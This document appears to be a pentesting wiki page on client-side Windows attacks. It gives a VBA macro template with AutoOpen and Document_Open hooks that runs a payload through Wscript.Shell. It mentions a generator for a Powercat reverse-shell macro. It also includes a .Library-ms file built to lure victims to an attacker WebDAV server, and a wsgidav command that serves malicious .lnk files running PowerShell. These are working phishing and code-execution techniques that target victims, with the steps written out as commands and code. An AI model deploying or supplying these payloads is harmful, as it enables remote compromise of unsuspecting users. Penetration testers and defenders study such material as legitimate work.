Client Side

Exploiting Microsoft Office

Steps to reproduce the doc macros attack using vba script

  1. Create new file using Microsoft Word.

  2. Create a new macro - View > Macros:

  3. Give the macro name > Select Macros in document > Click on Create:

  1. Write the Macro script within the payload:

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = <Payload>
    CreateObject("Wscript.Shell").Run Str
End Sub

  1. Save the file in doc\docm format which considered less secured, so the victim will just need to press enable to initiate the macros .

I've created useful python script which generates the VBA script content with Powercat Revshell payload given Local Host and Port:

python3 vba-powercat-revshell.py <local_host> <ip>

Exploiting Windows Library Files

Libraries are virtual containers for users' content.

This attack leverage .Library-ms file which will connect to attacker controlled WebDAV and be sent to a victim. Once the victim opens the file, he will think the WebDAV is a local windows folder. Then in the next stage the victim will click a malicious .lnk file using the WebDAV.

First creating the .Library-ms file: 

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url></url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

  • <libraryDescription>: This is the root element that defines the overall structure of a Windows library configuration.

  • <name>: Refers to a string identifier for the library.

  • <version>: Specifies the version of the library schema.

  • <isLibraryPinned>: Indicates whether the library is pinned in the user's navigation pane.

  • <iconReference>: Points to the resource for the icon associated with the library.

  • <templateInfo>: Contains metadata about the library's folder type template.

  • <folderType>: Defines the folder type or classification of the library using a GUID, which influences its behavior and appearance. These tag determine the columns and details that appear in Windows Explorer.

  • <searchConnectorDescriptionList>: A wrapper for a collection of search remote connectors that the library can use.

  • <searchConnectorDescription>: Defines individual search connectors, specifying details like save location and support status.

  • <isDefaultSaveLocation>: Indicates whether this search connector is the default location for saving files, set to true here.

  • <isSupported>: used for compatibility.

  • <simpleLocation>: Specifies the search connector’s location in a simplified format.

  • <url>: Points to the URL of the attacker's WebDAV server.

Serving the WebDAV Server including malicious files such .lnk file that runs PowerShell.

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root <directory_to_serve>

References

LogoWindows Libraries - Windows Client ManagementMicrosoftLearn
PreviousDC SyncNextNTLM Authentication

Last updated